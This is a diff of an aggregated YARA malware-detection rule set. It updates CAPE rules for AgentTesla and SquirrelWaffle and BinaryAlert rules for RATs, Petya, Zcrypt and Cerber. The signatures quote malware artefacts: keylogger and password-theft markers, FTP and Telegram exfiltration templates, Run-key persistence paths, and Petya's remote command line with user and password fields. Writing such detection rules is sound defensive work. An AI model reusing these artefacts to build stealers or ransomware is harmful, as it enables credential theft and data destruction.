-		$crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41}
-		$sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3}
-		$sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3}
-		$anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA}
-		$anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C}
-		$decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53}
-		$decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00}
-		$decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E}
-		$call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8}
+		$s1 = "get_kbHook" ascii
+		$s2 = "GetPrivateProfileString" ascii
+		$s3 = "get_OSFullName" ascii
+		$s4 = "get_PasswordHash" ascii
+		$s5 = "remove_Key" ascii
+		$s6 = "FtpWebRequest" ascii
+		$s7 = "logins" fullword wide
+		$s8 = "keylog" fullword wide
+		$s9 = "1.85 (Hash, version 2, native byte-order)" wide
+		$cl1 = "Postbox" fullword ascii
+		$cl2 = "BlackHawk" fullword ascii
+		$cl3 = "WaterFox" fullword ascii
+		$cl4 = "CyberFox" fullword ascii
+		$cl5 = "IceDragon" fullword ascii
+		$cl6 = "Thunderbird" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $* )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 6 of ( $s* ) and 2 of ( $cl* ) )
 }
-rule CAPE_Masslogger : FILE
+rule CAPE_Agentteslav3 : FILE
 {
 	meta:
-		description = "MassLogger"
-		author = "kevoreilly"
-		id = "0743421a-36f7-5b7c-859f-b461511151cb"
-		date = "2020-10-20"
-		modified = "2020-11-24"
+		description = "AgentTeslaV3 infostealer payload"
+		author = "ditekshen"
+		id = "c8ddd838-6ad4-56f3-a0cd-b890f809018c"
+		date = "2019-10-30"
+		modified = "2026-01-14"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/MassLogger.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AgentTesla.yar#L69-L115"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "cc9bbbcf3608b49a76b098acf846ff03eae5e9cb107697627d62661fa1be36c2"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "MassLogger Payload"
+		cape_type = "AgentTesla payload"
 
 	strings:
-		$name = "MassLogger"
-		$fody = "Costura"
+		$s_specific1 = "get_kbok" fullword ascii
+		$s_specific2 = "get_CHoo" fullword ascii
+		$s_specific3 = "KillTorProcess" fullword ascii
+		$s_specific4 = "GetMozilla" ascii
+		$s_specific5 = "torbrowser" wide
+		$s_specific6 = "bot%telegramapi%" wide
+		$s_specific7 = "%chatid%" wide
+		$s_typo = "set_Lenght" fullword ascii
+		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
+		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
+		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
+		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
+		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
+		$s_generic1 = "set_UseShellExecute" fullword ascii
+		$s_generic2 = "set_IsBodyHtml" fullword ascii
+		$s_generic3 = "set_AllowAutoRedirect" fullword ascii
+		$s_generic4 = "set_RedirectStandardOutput" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		(2 of ( $m* ) ) or ( uint16( 0 ) == 0x5a4d and ( 5 of ( $s_specific* ) or ( $s_typo and 4 of ( $s_generic* ) ) ) )
 }
-rule CAPE_Azorult : FILE
+rule CAPE_Agentteslav4 : FILE
 {
 	meta:
-		description = "Azorult Payload"
+		description = "AgentTesla Payload"
 		author = "kevoreilly"
-		id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8"
+		id = "a39109ca-84cb-527d-b9c2-d8763fa6e496"
 		date = "2019-10-30"
-		modified = "2022-06-09"
+		modified = "2026-01-14"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Azorult.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AgentTesla.yar#L117-L130"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Azorult Payload"
+		cape_type = "AgentTesla Payload"
+		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
 
 	strings:
-		$code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90}
-		$string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")"
+		$decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52}
+		$decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52}
+		$decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Rokrat : FILE
+rule CAPE_Squirrelwaffle : FILE
 {
 	meta:
-		description = "RokRat Payload"
-		author = "kevoreilly"
-		id = "12e05b90-9771-5901-ae82-9fd2ea6263e7"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		description = "No description has been set in the source file - CAPE"
+		author = "kevoreilly & R3MRUM"
+		id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7"
+		date = "2021-09-22"
+		modified = "2021-10-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/RokRat.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/SquirrelWaffle.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "RokRat Payload"
+		cape_type = "SquirrelWaffle Payload"
 
 	strings:
-		$code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9}
-		$string1 = "/pho_%s_%d.jpg" wide
+		$code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45}
+		$decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $code* ) ) and ( any of ( $string* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: BinaryAlert
  * Repository: https://github.com/airbnb/binaryalert/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: a9c0f06affc35e1f8e45bb77f835b92350c68a0b
- * Number of Rules: 80
+ * Number of Rules: 78
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
  *
  *
@@ -67053,39 +67053,6 @@ rule CAPE_Rokrat : FILE
    limitations under the License.
 
  */
-private rule BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE : FILE
-{
-	meta:
-		description = "Template to provide executable detection Cobalt Strike payloads"
-		author = "@javutin, @joseselvi"
-		id = "39c27acf-1264-584d-99e0-77b0e9352078"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_template.yara#L1-L28"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "492b2b0b319509fe26473add6ca50c246a0c30fb8a7f9e2631c8d3e9e146c611"
-		score = 75
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$compiler = "mingw-w64 runtime failure" nocase
-		$f1 = "VirtualQuery" fullword
-		$f2 = "VirtualProtect" fullword
-		$f3 = "vfprintf" fullword
-		$f4 = "Sleep" fullword
-		$f5 = "GetTickCount" fullword
-		$c1 = { // Compare case insensitive with "msvcrt", char by char
-                0f b6 50 01 80 fa 53 74 05 80 fa 73 75 42 0f b6
-                50 02 80 fa 56 74 05 80 fa 76 75 34 0f b6 50 03
-                80 fa 43 74 05 80 fa 63 75 26 0f b6 50 04 80 fa
-                52 74 05 80 fa 72 75 18 0f b6 50 05 80 fa 54 74
-        }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $compiler and all of ( $f* ) and all of ( $c* )
-}
 private rule BINARYALERT_Macho_PRIVATE : FILE
 {
 	meta:
@@ -67118,7 +67085,7 @@ rule BINARYALERT_Eicar_Av_Test
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
 		logic_hash = "870db233ca083fae19a88a109e13d086c76df2340b709eb2da565c08574a42bd"
 		score = 50
-		quality = 80
+		quality = 55
 		tags = ""
 
 	strings:
@@ -67149,644 +67116,525 @@ rule BINARYALERT_Eicar_Substring_Test
 	condition:
 		all of them
 }
-rule BINARYALERT_Malware_Multi_Vesche_Basicrat
-{
-	meta:
-		description = "cross-platform Python 2.x Remote Access Trojan (RAT)"
-		author = "@mimeframe"
-		id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/vesche/basicRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29"
-		score = 75
-		quality = 80
-		tags = ""
-
-	strings:
-		$a1 = "HKCU Run registry key applied" wide ascii
-		$a2 = "HKCU Run registry key failed" wide ascii
-		$a3 = "Error, platform unsupported." wide ascii
-		$a4 = "Persistence successful," wide ascii
-		$a5 = "Persistence unsuccessful," wide ascii
-
-	condition:
-		all of ( $a* )
-}
-rule BINARYALERT_Malware_Multi_Pupy_Rat
-{
-	meta:
-		description = "pupy - opensource cross platform rat and post-exploitation tool"
-		author = "@mimeframe"
-		id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263"
-		date = "2017-08-11"
-		modified = "2017-09-12"
-		reference = "https://github.com/n1nj4sec/pupy"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241"
-		score = 75
-		quality = 74
-		tags = ""
-
-	strings:
-		$a1 = "dumping lsa secrets" nocase wide ascii
-		$a2 = "dumping cached domain passwords" nocase wide ascii
-		$a3 = "the keylogger is already started" nocase wide ascii
-		$a4 = "pupyutils.dns" wide ascii
-		$a5 = "pupwinutils.security" wide ascii
-		$a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii
-
-	condition:
-		3 of ( $a* )
-}
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin"
 		author = "@fusionrace"
-		id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "b099b82acb860d9a9a571515024b35f0"
-		logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c"
-		score = 75
-		quality = 80
-		tags = ""
-
-	strings:
-		$a1 = "### PE STORAGE ###" wide ascii
-		$a2 = "### CRYPTO 0 ###" wide ascii
-		$a3 = "### EXTERNAL STORAGE ###" wide ascii
-		$a4 = "### CRYPTO 1 ###" wide ascii
-		$a5 = "### QUEUES ###" wide ascii
-		$a6 = "### TRANSPORT ###" wide ascii
-		$a7 = "### EXECUTION SUBSYSTEM ###" wide ascii
-		$a8 = "### AUTORUN MANAGER ###" wide ascii
-		$a9 = "### INJECT MANAGER ###" wide ascii
-		$a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii
-
-	condition:
-		6 of ( $a* )
-}
-rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat
-{
-	meta:
-		description = "HTTPS-based Remote Administration Tool (RAT)"
-		author = "@mimeframe"
-		id = "c5b0d183-8822-505a-a1ff-7d6f75a3f174"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/t3ntman/CrunchRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara#L1-L19"
+		id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b5216b2b30d22f3d3848e1fb6e4245c558366fb8cd35b70f10fa4e605e211204"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "<action>command<action>" wide ascii
-		$a2 = "<action>upload<action>" wide ascii
-		$a3 = "<action>download<action>" wide ascii
-		$a4 = "cmd.exe" wide ascii
-		$a5 = "application/x-www-form-urlencoded" wide ascii
-		$a6 = "&action=" wide ascii
-		$a7 = "&secondary=" wide ascii
-		$a8 = "<secondary>" wide ascii
-		$a9 = "<action>" wide ascii
+		$s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide
 
 	condition:
-		all of ( $a* )
+		$s1
 }
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_2
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
 		author = "@fusionrace"
-		id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "b099b82acb860d9a9a571515024b35f0"
-		logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23"
-		score = 75
-		quality = 80
-		tags = ""
-
-	strings:
-		$c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii
-		$c2 = "IsLoaderAlreadyWork" wide ascii
-		$c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii
-		$c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii
-
-	condition:
-		all of ( $c* )
-}
-rule BINARYALERT_Malware_Windows_Xrat_Quasarrat
-{
-	meta:
-		description = "xRAT is a derivative of QuasarRAT; this catches both RATs."
-		author = "@mimeframe"
-		id = "f4db2402-3653-5525-a137-de2de29cef28"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/quasar/QuasarRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e"
-		score = 75
-		quality = 30
-		tags = ""
-
-	strings:
-		$a1 = ">> New Session created" wide ascii
-		$a2 = ">> Session unexpectedly closed" wide ascii
-		$a3 = ">> Session closed" wide ascii
-		$a4 = "session unexpectedly closed" wide ascii
-		$a5 = "cmd" fullword wide ascii
-		$a6 = "/K" fullword wide ascii
-		$b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii
-		$b2 = "ping -n 20 localhost > nul" wide ascii
-		$b3 = "Downloading file..." wide ascii
-		$b4 = "Visited Website" wide ascii
-		$b5 = "Adding Autostart Item failed!" wide ascii
-		$b6 = ":Zone.Identifier" wide ascii
-		$c1 = "GetDrives I/O error" wide ascii
-		$c2 = "/r /t 0" wide ascii
-		$c3 = "desktop.ini" wide ascii
-		$c4 = "WAN IP Address" wide ascii
-		$c5 = "User refused the elevation request." wide ascii
-		$c6 = "Process already elevated." wide ascii
-
-	condition:
-		5 of ( $a* ) or 5 of ( $b* ) or 5 of ( $c* )
-}
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger
-{
-	meta:
-		description = "Rule to detect Moonlight Maze 'xk' keylogger"
-		author = "Kaspersky Lab"
-		id = "5623021d-0d70-59b3-ae30-522e81552da0"
+		id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982"
 		score = 75
-		quality = 30
+		quality = 78
 		tags = ""
 
 	strings:
-		$a1 = "Log ended at => %s"
-		$a2 = "Log started at => %s [pid %d]"
-		$a3 = "/var/tmp/task" fullword
-		$a4 = "/var/tmp/taskhost" fullword
-		$a5 = "my hostname: %s"
-		$a6 = "/var/tmp/tasklog"
-		$a7 = "/var/tmp/.Xtmp01" fullword
-		$a8 = "myfilename=-%s-"
-		$a9 = "/var/tmp/taskpid"
-		$a10 = "mypid=-%d-" fullword
-		$a11 = "/var/tmp/taskgid" fullword
-		$a12 = "mygid=-%d-" fullword
+		$s1 = "dllhost.dat" fullword wide
+		$s2 = "\\\\%ws\\admin$\\%ws" fullword wide
+		$s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide
+		$s4 = "\\\\.\\PhysicalDrive" fullword wide
+		$s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide
 
 	condition:
-		3 of ( $a* )
+		3 of them
 }
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2
+rule BINARYALERT_Ransomware_Windows_Zcrypt
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames"
 		author = "@fusionrace"
-		id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17"
+		id = "d79cd266-4e77-562c-975c-8bf72efe7242"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "06bd89448a10aa5c2f4ca46b4709a879"
-		logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1"
+		hash = "d1e75b274211a78d9c5d38c8ff2e1778"
+		logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
 
 	strings:
-		$b1 = "i cunt waiting anymore #%d" wide ascii
-		$b2 = "lights aint turnt off with #%d" wide ascii
-		$b3 = "Not find process" wide ascii
-		$b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii
-		$b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii
+		$u1 = "How to Buy Bitcoins" ascii wide
+		$u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide
+		$u3 = "Click Here to Show Bitcoin Address" ascii wide
+		$u4 = "MyEncrypter2.pdb" fullword ascii wide
+		$g1 = ".p7b" fullword ascii wide
+		$g2 = ".p7c" fullword ascii wide
+		$g3 = ".pdd" fullword ascii wide
+		$g4 = ".pef" fullword ascii wide
+		$g5 = ".pem" fullword ascii wide
+		$g6 = "How to decrypt files.html" fullword ascii wide
 
 	condition:
-		3 of ( $b* )
+		any of ( $u* ) or all of ( $g* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE
+rule BINARYALERT_Ransomware_Windows_Cerber_Evasion
 {
 	meta:
-		description = "Rule to detect log cleaners based on utclean.c"
-		author = "Kaspersky Lab"
-		id = "2dc1b796-c8fe-5a87-9d6b-3a322f4a43ab"
+		description = "Cerber Ransomware: Evades detection by machine learning applications"
+		author = "@fusionrace"
+		id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_u_logcleaner.yara#L3-L18"
+		reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15"
